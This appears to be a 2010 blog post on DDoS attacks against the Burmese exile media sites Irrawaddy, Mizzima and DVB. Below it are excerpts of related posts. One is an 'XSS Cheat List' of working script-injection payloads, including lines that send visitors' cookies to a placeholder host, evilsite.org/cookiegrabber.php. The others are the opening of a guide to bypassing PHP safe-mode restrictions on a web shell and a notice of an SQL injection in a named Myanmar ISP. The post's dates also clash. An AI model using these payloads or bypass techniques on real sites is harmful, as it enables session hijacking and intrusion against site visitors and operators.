Last September 28, BurmeseHackers Group Hacked Irrawaddy Online Store twice, and we’ve been discussed about that.

After a month, 27/09/2010: Irrawaddy, Mizzima and the Democratic Voice of Burma (DVB), were attacked on last Monday,

According to their official sites, The attacks coincided with the anniversary of the 2007 “Saffron Revolution.” A similar attack was launched against exile media in September 2008, on the uprising’s first anniversary. Websites were crippled for several days. The Irrawaddy’s website host in the US reported that the volume of the DDoS attack on The Irrawaddy was 4 gigabytes, 3 gigabytes larger than in September 2008.

The massive cyber attacks that shut down The Irrawaddy and Mizzima  came largely from Chinese internet provider addresses, while the attacks on the DVB website, measuring about 120 megabytes per second, came from Russia, Georgia, Israel, Kazakhstan, Ukraine and Vietnam.

In September 2008, the website was also attacked by a DDoS attack. The volume of the DDoS attack on Monday was 2 gigabytes, one gigabyte larger than the attack in Sept. 2008, according to Win Thu, the general manager of The Irrawaddy. Win Thu said that the attack would be short-term, but it has disrupted the daily news production and access by our readers. Hackers began the attack on the English and Burmese website address: www.irrawaddy.org at 1 a.m on Monday and later attacked The Irrawaddy’s mirror website: www.irrawaddymedia.com.

I can’t tell exactly and there’s no comment right now. I just wanna ask myself “Is it a begin of Myanmar Cyber War?”

Explore More

XSS Cheat List

<script>alert(1);</script> <script>alert('XSS');</script> <script src="http://www.evilsite.org/cookiegrabber.php"></script> <script>location.href="http://www.evilsite.org/cookiegrabber.php?cookie="+escape(document.cookie)</script> <scr<script>ipt>alert('XSS');</scr</script>ipt> <script>alert(String.fromCharCode(88,83,83))</script> <img src=foo.png onerror=alert(/xssed/) /> <style>@im\port'\ja\vasc\ript:alert(\"XSS\")';</style> <? echo('<scr)'; echo('ipt>alert(\"XSS\")</script>'); ?> <marquee><script>alert('XSS')</script></marquee> <IMG SRC=\"jav ascript:alert('XSS');\"> <IMG SRC=\"jav ascript:alert('XSS');\"> <IMG SRC=\"jav ascript:alert('XSS');\"> <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> "><script>alert(0)</script> <script src=http://yoursite.com/your_files.js></script> </title><script>alert(/xss/)</script> </textarea><script>alert(/xss/)</script>

Read More

Bypassing Shell Security

Safemode = On (Secure) Disables Functions = dl, passthru, proc_open, proc_nice, proc_terminate, proc_get_status, proc_close, pfsockopen, leak, apache_child_terminate, posix_kill, posix_mkfifo, posix_setpgid, posix_setsid, posix_setuid ================ Create A File “Php.ini” In Some Writeable

Read More

Critical SQL Injection in Myanmar Teleport – Myanmar Internet Service Provider (formerly known as BaganNet)

PlanetCreator has reported another critical SQL Injection (vulnerability) on Myanmar Teleport – Myanmar Internet Service Provider (formerly known as BaganNet) http://www.myantel.net.mm/ SQL injection is a code injection technique that exploits

Read More